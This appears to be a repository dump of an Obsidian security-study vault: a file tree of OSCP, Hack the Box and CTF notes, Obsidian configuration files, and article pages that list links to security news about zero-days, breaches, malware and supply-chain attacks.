├── .gitignore ├── .obsidian ├── app.json ├── appearance.json ├── core-plugins.json ├── graph.json ├── hotkeys.json ├── workspace └── workspaces.json ├── Articles ├── Bounties & Zero-Days.md ├── Crypto.md ├── Data Breaches.md ├── Large Scale Attacks & APTs.md ├── Linux Security.md ├── Malware.md ├── News Sources.md ├── Supply Chain Security.md ├── Twitter.md ├── Web Vulnerabilities.md └── Windows Security.md ├── Attachments ├── Pasted image 20210330103246.png ├── Pasted image 20210330104241.png ├── Pasted image 20210330111117.png ├── Pasted image 20210330111528.png ├── Pasted image 20210330113044.png ├── Pasted image 20210330114822.png ├── Pasted image 20210330115547.png ├── Pasted image 20210405151329.png ├── Pasted image 20210405152937.png ├── Pasted image 20210406083553.png ├── Pasted image 20210406083753.png ├── Pasted image 20210406085414.png ├── Pasted image 20210406085814.png ├── Pasted image 20210406090351.png ├── Pasted image 20210406090615.png ├── Pasted image 20210406091211.png ├── Pasted image 20210406092035.png ├── Pasted image 20210406092416.png ├── Pasted image 20210406101322.png ├── Pasted image 20210406101542.png ├── Pasted image 20210407195847.png ├── Pasted image 20210413145536.png ├── Pasted image 20210415125831.png ├── Pasted image 20210415130048.png ├── Pasted image 20210415130533.png ├── Pasted image 20210415131342.png ├── Pasted image 20210418150714.png ├── Pasted image 20210418171925.png ├── Pasted image 20210418173850.png ├── Pasted image 20210419140434.png ├── Pasted image 20210419141139.png ├── Pasted image 20210419143912.png ├── Pasted image 20210420170103.png ├── Pasted image 20210420170704.png ├── Pasted image 20210421211435.png ├── Pasted image 20210422155138.png ├── Pasted image 20210428122533.png ├── Pasted image 20210428122741.png ├── Pasted image 20210428122851.png ├── Pasted image 20210428123940.png ├── Pasted image 20210428124114.png ├── Pasted image 20210428124724.png ├── Pasted image 20210428130221.png ├── Pasted image 20210428131851.png ├── Pasted image 20210428134850.png ├── Pasted image 20210428135105.png ├── Pasted image 20210428143658.png ├── Pasted image 20210428154235.png ├── Pasted image 20210429082258.png ├── Pasted image 20210429083201.png ├── Pasted image 20210429102509.png ├── Pasted image 20210429110814.png ├── Pasted image 20210429124611.png ├── Pasted image 20210429124714.png ├── Pasted image 20210501111234.png ├── Pasted image 20210501114708.png ├── Pasted image 20210501180503.png ├── Pasted image 20210501185951.png ├── Pasted image 20210501191017.png ├── Pasted image 20210501191120.png ├── Pasted image 20210501191356.png ├── Pasted image 20210501192018.png ├── Pasted image 20210501205703.png ├── Pasted image 20210502103619.png ├── Pasted image 20210502104328.png ├── Pasted image 20210502104816.png ├── Pasted image 20210502105024.png ├── Pasted image 20210502105053.png ├── Pasted image 20210502105629.png ├── Pasted image 20210502180238.png ├── Pasted image 20210503224059.png ├── Pasted image 20210503224421.png ├── Pasted image 20210503225240.png ├── Pasted image 20210504124212.png ├── Pasted image 20210504124851.png ├── Pasted image 20210504124931.png ├── Pasted image 20210504131221.png ├── Pasted image 20210504131242.png ├── Pasted image 20210504132129.png ├── Pasted image 20210504132312.png ├── Pasted image 20210504133101.png ├── Pasted image 20210504133324.png ├── Pasted image 20210504133752.png ├── Pasted image 20210504133840.png ├── Pasted image 20210504135209.png ├── Pasted image 20210504135400.png ├── Pasted image 20210504142751.png ├── Pasted image 20210504143146.png ├── Pasted image 20210504145745.png ├── Pasted image 20210505083541.png ├── Pasted image 20210505085925.png ├── Pasted image 20210505085959.png ├── Pasted image 20210505090142.png ├── Pasted image 20210505090246.png ├── Pasted image 20210505090543.png ├── Pasted image 20210505090749.png ├── Pasted image 20210505091030.png ├── Pasted image 20210505093721.png ├── Pasted image 20210505101232.png ├── Pasted image 20210505104808.png ├── Pasted image 20210505105226.png ├── Pasted image 20210505105452.png ├── Pasted image 20210505111640.png ├── Pasted image 20210505111945.png ├── Pasted image 20210505112810.png ├── Pasted image 20210505114032.png ├── Pasted image 20210506083252.png ├── Pasted image 20210506083329.png ├── Pasted image 20210506083738.png ├── Pasted image 20210506083852.png ├── Pasted image 20210506084032.png ├── Pasted image 20210506084213.png ├── Pasted image 20210506084248.png ├── Pasted image 20210506084346.png ├── Pasted image 20210506084830.png ├── Pasted image 20210506130704.png ├── Pasted image 20210506131102.png ├── Pasted image 20210506131724.png ├── Pasted image 20210506134925.png ├── Pasted image 20210506135232.png ├── Pasted image 20210506135522.png ├── Pasted image 20210506193551.png ├── Pasted image 20210506193834.png ├── Pasted image 20210506194354.png ├── Pasted image 20210511212151.png ├── Pasted image 20210511212241.png ├── Pasted image 20210511212346.png ├── Pasted image 20210511212441.png ├── Pasted image 20210511212512.png ├── Pasted image 20210511212607.png ├── Pasted image 20210511212810.png ├── Pasted image 20210511212911.png ├── Pasted image 20210511212937.png ├── Pasted image 20210511213257.png ├── Pasted image 20210511213836.png ├── Pasted image 20210511214013.png ├── Pasted image 20210511214137.png ├── Pasted image 20210511214340.png ├── Pasted image 20210527214836.png ├── Pasted image 20210605184135.png ├── Pasted image 20210605184317.png ├── Pasted image 20210605184402.png ├── Pasted image 20210605185025.png ├── Pasted image 20210605185207.png ├── Pasted image 20210605185310.png ├── Pasted image 20210605191522.png ├── Pasted image 20210605191834.png ├── Pasted image 20210605191917.png ├── Pasted image 20210605192048.png ├── Pasted image 20210605192151.png ├── Pasted image 20210605212024.png ├── Pasted image 20210605212547.png ├── Pasted image 20210605212657.png ├── Pasted image 20210607210556.png ├── Pasted image 20210607210839.png ├── Pasted image 20210611170617.png ├── Pasted image 20210611174318.png ├── Pasted image 20210611194007.png ├── Pasted image 20210611234551.png ├── Pasted image 20210611235015.png ├── Pasted image 20210612000915.png ├── Pasted image 20210612001312.png ├── Pasted image 20210612124335.png ├── Pasted image 20210612124713.png ├── Pasted image 20210612124906.png ├── Pasted image 20210612125842.png ├── Pasted image 20210612125902.png ├── Pasted image 20210612130005.png ├── Pasted image 20210612130520.png ├── Pasted image 20210612130731.png ├── Pasted image 20210612130829.png ├── Pasted image 20210612131021.png ├── Pasted image 20210612131340.png ├── Pasted image 20210612131404.png ├── Pasted image 20210612131505.png ├── Pasted image 20210612131620.png ├── Pasted image 20210612131745.png ├── Pasted image 20210612132004.png ├── Pasted image 20210612132028.png ├── Pasted image 20210612132124.png ├── Pasted image 20210612132213.png ├── Pasted image 20210612132748.png ├── Pasted image 20210612132814.png ├── Pasted image 20210612133521.png ├── Pasted image 20210612134305.png ├── Pasted image 20210612135954.png ├── Pasted image 20210612141104.png ├── Pasted image 20210612141148.png ├── Pasted image 20210612141910.png ├── Pasted image 20210612142007.png ├── Pasted image 20210612142103.png ├── Pasted image 20210612142418.png ├── Pasted image 20210612143319.png ├── Pasted image 20210612143650.png ├── Pasted image 20210612144401.png ├── Pasted image 20210612144448.png ├── Pasted image 20210612144729.png ├── Pasted image 20210612145609.png ├── Pasted image 20210612151527.png ├── Pasted image 20210612151628.png ├── Pasted image 20210612151702.png ├── Pasted image 20210612151738.png ├── Pasted image 20210612151801.png ├── Pasted image 20210612152324.png ├── Pasted image 20210612152841.png ├── Pasted image 20210612153059.png ├── Pasted image 20210612160656.png ├── Pasted image 20210612160716.png ├── Pasted image 20210612161536.png ├── Pasted image 20210612161610.png ├── Pasted image 20210612161953.png ├── Pasted image 20210612163258.png ├── Pasted image 20210612163616.png ├── Pasted image 20210612163639.png ├── Pasted image 20210613111026.png ├── Pasted image 20210613111557.png ├── Pasted image 20210613112857.png ├── Pasted image 20210613112915.png ├── Pasted image 20210613113210.png ├── Pasted image 20210613113227.png ├── Pasted image 20210613113907.png ├── Pasted image 20210613114847.png ├── Pasted image 20210613115128.png ├── Pasted image 20210613115437.png ├── Pasted image 20210613122211.png ├── Pasted image 20210613122410.png ├── Pasted image 20210613124656.png ├── Pasted image 20210613134757.png ├── Pasted image 20210613134842.png ├── Pasted image 20210613135029.png ├── Pasted image 20210613135104.png ├── Pasted image 20210614082656.png ├── Pasted image 20210614082713.png ├── Pasted image 20210614085505.png ├── Pasted image 20210614085530.png ├── Pasted image 20210614092358.png ├── Pasted image 20210614092432.png ├── Pasted image 20210614092454.png ├── Pasted image 20210614092556.png ├── Pasted image 20210614093230.png ├── Pasted image 20210614093422.png ├── Pasted image 20210614100713.png ├── Pasted image 20210614101325.png ├── Pasted image 20210614103350.png ├── Pasted image 20210614103814.png ├── Pasted image 20210614105016.png ├── Pasted image 20210614105225.png ├── Pasted image 20210614105519.png ├── Pasted image 20210614115346.png ├── Pasted image 20210614115441.png ├── Pasted image 20210614115505.png ├── Pasted image 20210614115751.png ├── Pasted image 20210614120008.png ├── Pasted image 20210614120025.png ├── Pasted image 20210614120438.png ├── Pasted image 20210614120758.png ├── Pasted image 20210614120816.png ├── Pasted image 20210614123703.png ├── Pasted image 20210614132531.png ├── Pasted image 20210614132628.png ├── Pasted image 20210614132807.png ├── Pasted image 20210614132849.png ├── Pasted image 20210619220508.png ├── Pasted image 20210619220700.png ├── Pasted image 20210619220754.png ├── Pasted image 20210619220834.png ├── Pasted image 20210619220854.png ├── Pasted image 20210619220929.png ├── Pasted image 20210621224914.png ├── Pasted image 20210625215523.png ├── Pasted image 20210625215555.png ├── Pasted image 20210626114517.png ├── Pasted image 20210626132335.png ├── Pasted image 20210626132407.png ├── Pasted image 20210626132511.png ├── Pasted image 20210626132540.png ├── Pasted image 20210628184558.png ├── Pasted image 20210715202006.png ├── Pasted image 20210715202129.png ├── Pasted image 20210715202930.png ├── Pasted image 20210715203034.png ├── Pasted image 20210715203120.png ├── Pasted image 20210715203218.png ├── Pasted image 20210715203759.png ├── Pasted image 20210715203837.png ├── Pasted image 20210715203948.png ├── Pasted image 20210715204001.png ├── Pasted image 20210715204300.png ├── Pasted image 20210715204447.png ├── Pasted image 20210715205242.png ├── Pasted image 20210715205357.png ├── Pasted image 20210715212801.png ├── Pasted image 20210715222444.png ├── Pasted image 20210715223211.png ├── Pasted image 20211119172219.png ├── Pasted image 20211119172932.png ├── Pasted image 20211119174505.png ├── Pasted image 20211119175244.png ├── Pasted image 20211119175626.png ├── Pasted image 20211121203851.png ├── Pasted image 20211121223427.png ├── Pasted image 20211121223522.png ├── Pasted image 20211121223548.png ├── Pasted image 20211121223624.png ├── Pasted image 20211121224508.png ├── Pasted image 20211121224601.png ├── Pasted image 20211121224706.png ├── Pasted image 20211121225027.png ├── Pasted image 20211121225454.png ├── Pasted image 20211121225817.png ├── Pasted image 20211121225903.png ├── Pasted image 20211121225935.png ├── Pasted image 20211121230551.png ├── Pasted image 20211121230646.png ├── Pasted image 20211121230757.png ├── Pasted image 20211121230915.png ├── Pasted image 20211121230956.png └── Pasted image 20211121231045.png ├── Cheat Sheets ├── Aliases.md ├── Common Tools │ ├── Gobuster.md │ ├── netcat.md │ ├── nmap.md │ ├── smbclient.md │ └── smbmap.md ├── Enumeration │ ├── Docker Enumeration.md │ ├── Linux Enumeration.md │ └── Reconnaisance.md ├── Fundamental Skills.md ├── Linux │ ├── Basic Linux Commands.md │ ├── Linux Misc.md │ ├── Linux Networking.md │ └── Linux Shells.md ├── Networking │ └── Common Ports.md ├── Password Cracking │ ├── Creating a Hashfile.md │ ├── Generating a Wordlist.md │ ├── Hashcat.md │ ├── Identifying Hashes.md │ └── John the Ripper.md ├── Shells │ └── Reverse Shells.md └── Web Hacking │ ├── Deserialisation.md │ └── File Upload.md ├── Exam Resources └── OSCP │ ├── Exam Details.md │ ├── OSCP - My Experience.md │ ├── OSCP Practice Exam Writeups.md │ ├── OSCP Prep Series Intro.md │ └── OSCP Resources.md ├── Methodology Checklist.md ├── Projects └── CTF Tools.md ├── README.md ├── SESH ├── CTFs │ └── BakeryTF │ │ └── Challenge Development Index.md ├── Demos │ └── Deserialisation Demo.md └── SESH Index.md ├── Starting Point.md ├── To Add.md ├── Useful Resources.md ├── Vulnerabilities ├── Networking │ └── CVE-2020-12271.md ├── SSH │ └── CVE-2012-5975.md ├── Vulnerabilities Index.md └── Windows │ ├── CVE-2017-0143.md │ └── CVE-2021-24092.md └── Writeups ├── CTFs ├── HTB Uni CTF 2021 │ └── Upgrades - Reversing Challenge.md └── SESH BakeryTF │ ├── BakeryTF Writeups Index.md │ ├── Juicy Part 3 Writeup.md │ └── Raspberry Peist Writeup.md ├── Hack the Box └── Boxes │ ├── Armageddon │ ├── 0 - Overview.md │ ├── 01 - Loot.md │ ├── 05 - Enumeration.md │ ├── 10 - Website.md │ ├── 15 - Shell as apache.md │ ├── 20 - SSH as brucetherealadmin.md │ └── Armageddon Index.md │ ├── Atom │ ├── 0 - Overview.md │ ├── 10 - Website.md │ ├── 15 - SMB.md │ ├── 20 - Exploiting Electron Builder.md │ ├── 25 - Automate Foothold.md │ ├── 30 - Shell as jason.md │ ├── 5 - Enumeration.md │ └── Atom Index.md │ ├── Bashed │ ├── 0 - Overview.md │ ├── 10 - Website.md │ ├── 15 - Privesc.md │ ├── 20 - Key Lessons.md │ ├── 5 - Enumeration.md │ └── Bashed Index.md │ ├── Blue │ ├── 0 - Overview.md │ ├── 10 - Eternal Blue.md │ ├── 15 - Key Lessons.md │ ├── 5 - Enumeration.md │ └── Blue Index.md │ ├── Bucket │ ├── 0 - Overview.md │ ├── 1 - Loot.md │ ├── 10 - Website.md │ ├── 15 - Shell as www-data.md │ ├── 20 - Shell as roy.md │ ├── 5 - Enumeration.md │ └── Bucket Index.md │ ├── Cereal │ ├── 0 - Overview.md │ ├── 1 - Loot.md │ ├── 10 - cereal.htb.md │ ├── 11 - source.cereal.htb.md │ ├── 15 - Source Code.md │ ├── 20 - Cereal Requests.md │ ├── 25 - Deserialisation.md │ ├── 30 - XSS.md │ ├── 35 - Exploit Chain.md │ ├── 40 - Shell as sonny.md │ ├── 5 - Enumeration.md │ └── Cereal Index.md │ ├── Devel │ ├── 0 - Overview.md │ ├── 05 - Enumeration.md │ ├── 10 - FTP.md │ ├── 15 - Website.md │ ├── 20 - Shell as iis apppool.md │ ├── 25 - Key Lessons Learned.md │ └── Devel Index.md │ ├── Granny │ ├── 0 - Overview.md │ ├── 10 - Website.md │ ├── 15 - Shell as Network Service.md │ ├── 20 - Key Lessons.md │ ├── 5 - Enumeration.md │ └── Granny Index.md │ ├── Jerry │ ├── 0 - Overview.md │ ├── 10 - Tomcat.md │ ├── 15 - Key Lessons.md │ ├── 5 - Enumeration.md │ └── Jerry Index.md │ ├── Lame │ ├── 0 - Overview.md │ ├── 10 - FTP.md │ ├── 15 - SMB.md │ ├── 5 - Enumeration.md │ └── Lame Index.md │ ├── Legacy │ ├── 0 - Overview.md │ ├── 10 - Eternal Blue.md │ ├── 15 - Key Lessons.md │ ├── 5 - Enumeration.md │ └── Legacy Index.md │ ├── Optimum │ ├── 0 - Overview.md │ ├── 05 - Enumeration.md │ ├── 10 - Website.md │ ├── 15 - Shell as kostas.md │ ├── 20 - Key Lessons.md │ └── Optimum Index.md │ ├── Scriptkiddie │ ├── 0 - Overview.md │ ├── 10 - Website.md │ ├── 15 - Metasploit CVE.md │ ├── 20 - Shell as kid.md │ ├── 25 - Shell as pwn to Root.md │ ├── 5 - Enumeration.md │ └── Scriptkiddie Index.md │ ├── Shocker │ ├── 0 - Overview.md │ ├── 05 - Enumeration.md │ ├── 10 - OpenSSH.md │ ├── 15 - Website.md │ ├── 20 - Shell as shelly.md │ ├── 25 - Key Lessons.md │ └── Shocker Index.md │ └── Writeup │ ├── 00 - Overview.md │ ├── 05 - Enumeration.md │ ├── 10 - Website.md │ ├── 15 - Shell as jkr.md │ ├── 20 - Key Lessons.md │ └── Writeup Index.md └── SESH └── DVWA └── Shells Session Writeup - DVWA.md /.gitignore: -------------------------------------------------------------------------------- 1 | .trash/* 2 | .obsidian/cache 3 | .obsidian/workspace-* 4 | -------------------------------------------------------------------------------- /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "promptDelete": false, 3 | "alwaysUpdateLinks": false, 4 | "defaultViewMode": "preview", 5 | "attachmentFolderPath": "Attachments" 6 | } -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "baseFontSize": 16 3 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "page-preview", 8 | "note-composer", 9 | "command-palette", 10 | "markdown-importer", 11 | "random-note", 12 | "outline", 13 | "word-count", 14 | "open-with-default-app", 15 | "workspaces", 16 | "file-recovery" 17 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": false, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18 | "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 0.5964937568776445, 21 | "close": true 22 | } -------------------------------------------------------------------------------- /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | { 2 | "random-note": [ 3 | { 4 | "modifiers": [ 5 | "Mod" 6 | ], 7 | "key": "R" 8 | } 9 | ], 10 | "app:toggle-default-new-pane-mode": [ 11 | { 12 | "modifiers": [ 13 | "Mod", 14 | "Shift" 15 | ], 16 | "key": "E" 17 | } 18 | ], 19 | "graph:open-local": [ 20 | { 21 | "modifiers": [ 22 | "Mod" 23 | ], 24 | "key": "L" 25 | } 26 | ], 27 | "workspace:split-horizontal": [ 28 | { 29 | "modifiers": [ 30 | "Alt", 31 | "Mod" 32 | ], 33 | "key": "H" 34 | } 35 | ], 36 | "workspace:split-vertical": [ 37 | { 38 | "modifiers": [ 39 | "Alt", 40 | "Mod" 41 | ], 42 | "key": "V" 43 | } 44 | ] 45 | } -------------------------------------------------------------------------------- /.obsidian/workspaces.json: -------------------------------------------------------------------------------- 1 | {"workspaces":{"Start Here!":{"main":{"id":"7684b2515614580b","type":"split","children":[{"id":"8db6e8b228d5c812","type":"leaf","state":{"type":"markdown","state":{"file":"Starting Point.md","mode":"preview"}},"group":"ebeae51d7fed9e4c"},{"id":"32653db332b3f239","type":"leaf","state":{"type":"localgraph","state":{"file":"Starting Point.md","options":{"collapse-filter":true,"search":"","localJumps":1,"localBacklinks":true,"localForelinks":true,"localInterlinks":false,"showTags":false,"showAttachments":false,"hideUnresolved":false,"collapse-color-groups":true,"colorGroups":[],"collapse-display":true,"showArrow":false,"textFadeMultiplier":0,"nodeSizeMultiplier":1,"lineSizeMultiplier":1,"collapse-forces":true,"centerStrength":0.518713248970312,"repelStrength":10,"linkStrength":1,"linkDistance":250,"scale":1,"close":false}}},"group":"ebeae51d7fed9e4c"}],"direction":"vertical"},"left":{"id":"b8df5bd0fc2efa4f","type":"split","children":[{"id":"8d4f375b0ae73b66","type":"tabs","children":[{"id":"833b91e6ebe451de","type":"leaf","state":{"type":"file-explorer","state":{}}},{"id":"4fd6f4be5a5fef0c","type":"leaf","state":{"type":"search","state":{"query":"\"key lessons\"","matchingCase":false,"explainSearch":false,"collapseAll":false,"extraContext":false,"sortOrder":"alphabetical"}}}]}],"direction":"horizontal","width":280,"collapsed":true},"right":{"id":"4aa42a08b2824dd0","type":"split","children":[{"id":"a7c9d65e7d3521ad","type":"tabs","children":[{"id":"f550629c26df6417","type":"leaf","state":{"type":"backlink","state":{"file":"Starting Point.md","collapseAll":false,"extraContext":false,"sortOrder":"alphabetical","showSearch":false,"searchQuery":"","backlinkCollapsed":false,"unlinkedCollapsed":false}}}]}],"direction":"horizontal","width":300,"collapsed":true},"active":"32653db332b3f239"}},"active":"Start Here!"} -------------------------------------------------------------------------------- /Articles/Bounties & Zero-Days.md: -------------------------------------------------------------------------------- 1 | # Bounties & Zero-Days 2 | 3 | Impressive bug bounty submissions and interesting zero-day bugs 4 | 5 | ## Google Bug Bounty Competition - May 2020 6 | 7 | [https://www.ezequiel.tech/2020/05/rce-in-cloud-dm.html](https://www.ezequiel.tech/2020/05/rce-in-cloud-dm.html) 8 | 9 | [LiveOverflow Overview of Competition Result](https://www.youtube.com/watch?v=g-JgA1hvJzA) 10 | 11 | ## Zoom RCE - April 2021 12 | 13 | [https://www.zdnet.com/article/critical-zoom-vulnerability-triggers-remote-code-execution-without-user-input/](https://www.zdnet.com/article/critical-zoom-vulnerability-triggers-remote-code-execution-without-user-input/) 14 | 15 | ## Chrome Type Mismatch - Pwn2Own $100k - April 2021 16 | 17 | [https://threatpost.com/chrome-zero-day-exploit-twitter/165363/](https://threatpost.com/chrome-zero-day-exploit-twitter/165363/) 18 | 19 | # Tags 20 | 21 | #article #cve -------------------------------------------------------------------------------- /Articles/Crypto.md: -------------------------------------------------------------------------------- 1 | # Crypto 2 | 3 | ## What Went Wrong - Adobe 2013 4 | 5 | [https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/](https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/) 6 | 7 | ## Rebuilding RSA Keys - Cryptohacks 8 | 9 | [https://blog.cryptohack.org/twitter-secrets]( 10 | https://blog.cryptohack.org/twitter-secrets) 11 | 12 | ## Breaking RSA - NCC Group Slides 13 | 14 | [https://speakerdeck.com/rlifchitz/15-ways-to-break-rsa-security?slide=23https://www.nccgroup.com/uk/protection-detection-and-response/threat-intelligence/](https://speakerdeck.com/rlifchitz/15-ways-to-break-rsa-security?slide=23https://www.nccgroup.com/uk/protection-detection-and-response/threat-intelligence/) 15 | 16 | # Tags 17 | 18 | #article #cryptography -------------------------------------------------------------------------------- /Articles/Data Breaches.md: -------------------------------------------------------------------------------- 1 | # Data Breaches 2 | 3 | ## Facebook 2021 4 | 5 | [https://www.businessinsider.com/how-to-find-out-if-your-data-exposed-breach-facebook-2021-4](https://www.businessinsider.com/how-to-find-out-if-your-data-exposed-breach-facebook-2021-4) 6 | 7 | **Troy Hunt Analysis** 8 | 9 | [Twitter Thread - Deciding Whether to Include in HIBP](https://twitter.com/troyhunt/status/1378503918284460035) 10 | 11 | [https://www.troyhunt.com/the-facebook-phone-numbers-are-now-searchable-in-have-i-been-pwned/](https://www.troyhunt.com/the-facebook-phone-numbers-are-now-searchable-in-have-i-been-pwned/) 12 | 13 | # Tags 14 | 15 | #article #infosec -------------------------------------------------------------------------------- /Articles/Linux Security.md: -------------------------------------------------------------------------------- 1 | # Linux Security 2 | 3 | ## Sudo Vulnerability - CVE-2021-3156 4 | 5 | [https://www.theregister.com/2021/01/26/qualys_sudo_bug/](https://www.theregister.com/2021/01/26/qualys_sudo_bug/) 6 | 7 | ## University of Minnesota Kernel Bugs 8 | 9 | [https://fosspost.org/researchers-secretly-tried-to-add-vulnerabilities-to-linux-kernel/](https://fosspost.org/researchers-secretly-tried-to-add-vulnerabilities-to-linux-kernel/) 10 | 11 | [https://www.theverge.com/2021/4/22/22398156/university-minnesota-linux-kernal-ban-research](https://www.theverge.com/2021/4/22/22398156/university-minnesota-linux-kernal-ban-research) 12 | 13 | [https://www.bleepingcomputer.com/news/security/linux-bans-university-of-minnesota-for-committing-malicious-code/](https://www.bleepingcomputer.com/news/security/linux-bans-university-of-minnesota-for-committing-malicious-code/) 14 | 15 | # Tags 16 | 17 | #article #unix #cve -------------------------------------------------------------------------------- /Articles/Malware.md: -------------------------------------------------------------------------------- 1 | # Malware 2 | 3 | ## VMWare Ransomware - May 2021 4 | 5 | [https://www.theregister.com/AMP/2021/03/01/esxi_ransomware/](https://www.theregister.com/AMP/2021/03/01/esxi_ransomware/) 6 | 7 | # Tags 8 | 9 | #article #malware -------------------------------------------------------------------------------- /Articles/News Sources.md: -------------------------------------------------------------------------------- 1 | # News Sources 2 | 3 | ## Written News 4 | 5 | - [Hacker News](https://news.ycombinator.com/) - A curated list of technology news articles 6 | - [The Register](https://www.theregister.com/) 7 | - [Ars Technica](https://arstechnica.com/) 8 | - [zdnet](https://www.zdnet.com/) 9 | 10 | ## Podcasts 11 | 12 | - [Haunted Hacker Podcast](https://www.youtube.com/channel/UCMTI8uupT2orU0WeLDiqZ-g/videos) 13 | 14 | ## NCSC 15 | 16 | ### Blog 17 | 18 | [https://www.ncsc.gov.uk/section/keep-up-to-date/ncsc-news](https://www.ncsc.gov.uk/section/keep-up-to-date/ncsc-news) 19 | 20 | ### CiSP 21 | 22 | [https://www.ncsc.gov.uk/section/keep-up-to-date/cisp](https://www.ncsc.gov.uk/section/keep-up-to-date/cisp) 23 | 24 | ### 2020 Annual Review 25 | 26 | [https://www.ncsc.gov.uk/news/annual-review-2020](https://www.ncsc.gov.uk/news/annual-review-2020) 27 | 28 | # Tags 29 | 30 | #article -------------------------------------------------------------------------------- /Articles/Supply Chain Security.md: -------------------------------------------------------------------------------- 1 | # Supply Chain Security 2 | 3 | ## Alex Birsan Dependency Confusion - Feb 2021 4 | 5 | [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) 6 | 7 | ## PHP Supply Chain Attack - March 2021 8 | 9 | [https://arstechnica.com/gadgets/2021/03/hackers-backdoor-php-source-code-after-breaching-internal-git-server/](https://arstechnica.com/gadgets/2021/03/hackers-backdoor-php-source-code-after-breaching-internal-git-server/) 10 | 11 | [https://laravel-news.com/postmortem-of-php-core-compromise-continues](https://laravel-news.com/postmortem-of-php-core-compromise-continues) 12 | 13 | # Tags 14 | 15 | #article #supply-chain -------------------------------------------------------------------------------- /Articles/Twitter.md: -------------------------------------------------------------------------------- 1 | # Twitter 2 | 3 | ## Who To Follow 4 | 5 | - [@ippsec](https://twitter.com/ippsec) 6 | - [@InfosecGirlTH](https://twitter.com/InfosecGirlTH) 7 | - [@0xdf_](https://twitter.com/0xdf_) 8 | - [@0xTib3rius](https://twitter.com/0xTib3rius) 9 | - [@LiveOverflow](https://twitter.com/LiveOverflow) 10 | - [@orange_8361](https://twitter.com/orange_8361) 11 | 12 | ## Good threads 13 | 14 | ### IppSec Pen Test Writeup 15 | 16 | [https://twitter.com/ippsec/status/1369309701050142720?s=19](https://twitter.com/ippsec/status/1369309701050142720?s=19) 17 | 18 | ### Troy Hunt Analysis of Facebook Data Breach 19 | 20 | [https://twitter.com/troyhunt/status/1378503918284460035](https://twitter.com/troyhunt/status/1378503918284460035) 21 | 22 | ### InfoSec Graphics 23 | 24 | [https://twitter.com/SecurityGuill/status/1368241476753371140?s=19](https://twitter.com/SecurityGuill/status/1368241476753371140?s=19) 25 | 26 | ### Great Tools You Might be Skeptical Of 27 | 28 | [https://twitter.com/varcharr/status/1384193596589445127?s=19](https://twitter.com/varcharr/status/1384193596589445127?s=19) 29 | 30 | # Tags 31 | 32 | #article #infosec -------------------------------------------------------------------------------- /Articles/Web Vulnerabilities.md: -------------------------------------------------------------------------------- 1 | # Web Vulnerabilities 2 | 3 | ## SSO SAML XML Injection - May 2021 4 | 5 | [https://portswigger.net/daily-swig/vulnerabilities-in-single-sign-on-services-could-be-abused-to-bypass-authentication-controls](https://portswigger.net/daily-swig/vulnerabilities-in-single-sign-on-services-could-be-abused-to-bypass-authentication-controls) 6 | 7 | ## v8 Vulnerabilities 8 | 9 | Vulnerabilities in Google's Javascript Rendering Engine 10 | 11 | Often exploited by highly advanced attackers 12 | 13 | ### CVE-2020-16010 - RCE and Sandbox Escape, Android - Nov 2020 14 | 15 | [https://www.techspot.com/news/87433-chrome-zero-day-v8-vulnerability-found-actively-exploited.html](https://www.techspot.com/news/87433-chrome-zero-day-v8-vulnerability-found-actively-exploited.html) 16 | 17 | **Related, Multiple 0-days** 18 | 19 | [https://www.zdnet.com/article/google-patches-two-more-chrome-zero-days/](https://www.zdnet.com/article/google-patches-two-more-chrome-zero-days/) 20 | 21 | ### CVE-2021-21148 - Heap Overflow - Feb 2021 22 | 23 | [https://www.zdnet.com/article/google-patches-an-actively-exploited-chrome-zero-day/](https://www.zdnet.com/article/google-patches-an-actively-exploited-chrome-zero-day/) 24 | 25 | ### CVE-2021-21224 - Type Confusion - April 2021 26 | 27 | [https://www.welivesecurity.com/2021/04/21/google-fix-zero-day-vulnerability-chrome/](https://www.welivesecurity.com/2021/04/21/google-fix-zero-day-vulnerability-chrome/) 28 | 29 | ## Google Project Zero 30 | 31 | Searching for browser vulnerabilities and exploring [[Bounties & Zero-Days|0-days]] 32 | 33 | [https://googleprojectzero.blogspot.com/](https://googleprojectzero.blogspot.com/) 34 | 35 | Specific CVE Analyses: 36 | - [CVE-2020-6418](https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-6418.html) 37 | 38 | # Tags 39 | 40 | #article #web -------------------------------------------------------------------------------- /Articles/Windows Security.md: -------------------------------------------------------------------------------- 1 | # Windows Security 2 | 3 | ## Teams Gif Account Hijack - April 2020 4 | 5 | [https://www.cyberark.com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams](https://www.cyberark.com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams) 6 | 7 | [https://www.windowscentral.com/teams-vulnerability-fixed-allowed-gif-access-users-data-windows-10](https://www.windowscentral.com/teams-vulnerability-fixed-allowed-gif-access-users-data-windows-10) 8 | 9 | ## Microsoft Defender Privilege Escalation - February 2021 10 | 11 | [https://labs.sentinelone.com/cve-2021-24092-12-years-in-hiding-a-privilege-escalation-vulnerability-in-windows-defender/](https://labs.sentinelone.com/cve-2021-24092-12-years-in-hiding-a-privilege-escalation-vulnerability-in-windows-defender/) 12 | 13 | 